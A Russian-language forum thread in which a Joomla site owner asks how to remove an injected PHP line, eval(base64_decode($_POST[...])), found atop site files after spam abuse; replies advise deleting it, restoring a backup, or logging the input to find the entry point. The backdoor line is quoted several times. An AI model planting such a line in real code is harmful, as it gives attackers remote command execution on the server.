Как избавиться отbase64_decode код на странице?

Question

[leopardo11]

Есть сайт на joomla, функция mail() была остановлена на хостинге из-за спам рассылки, порывшись на сайте, нашел такие коды <?php eval(base64_decode($_POST['n08c394']));?> в начале php файлов? но когда некоторые начинаю удалять, сайт перестает работать. Как правильно от них избавиться?
Сайт на Joomla, полностью удалить сайт не вариант, сайт рабочий

Answer 1

[maddog670]

Такой код расценивается как вредоносный, рекомендуется удалить его полностью
от самого начала и до конца и проверить файлы на вставку этого кода
<?php eval(base64_decode($_POST['n08c394']));?>

Comments

[leopardo11]

Спасибо)

[Алексей]

@leopardo11 Пометьте ответ как решение, а не спасибо

[leopardo11]

@rdifb0 пометил)

Answer 2

[Scorpi]

Что значит перестаёт работать? Ошибка какая то?

Answer 3

[leopardo11]

да, скриптом переименовал eval(base64_decode($_POST['n08c394'])); на eval(blabla($_POST['n08c394']));

Comments

[leopardo11]

пишет что типа нет такой функции как blabla

[Scorpi]

Естественно что будет ошибка, так делать нельзя.
Просто удалите полностью этот участок кода.

[leopardo11]

Действительно. Не догадался удалить просто %)

Answer 4

[Пума Тайланд]

восстановите сайт из бекапа просто

Answer 5

[Ivan Soshnikov]

Лучше бы сохранили в лог "base64_decode($_POST['n08c394'])" с сопутствующей инфой и посмотрели, что там такое запускается и откуда лезет.
Понимание, самый верный способ решить проблему. Я так понимаю, что удаление этой дряни не закроет ту дыру, через которую она образовалась.

Comments

[Пума Тайланд]

а чего т ам смотреть то это выполнение любой команды переданной в посте
можно все что угодно делать хоть вебшелить хоть спам слать.